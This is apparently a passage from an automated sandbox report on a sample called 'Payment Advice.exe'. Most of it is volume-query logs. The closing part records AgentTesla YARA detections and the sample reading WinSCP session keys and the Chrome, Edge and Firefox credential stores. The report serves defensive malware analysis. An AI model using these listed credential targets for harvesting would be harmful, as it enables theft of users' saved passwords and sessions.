                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Users\user\Desktop\Payment Advice.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payment Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 6700, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sFPEKzHsLkYZIz.exe PID: 7816, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7952, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 6576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7492, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 4092, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
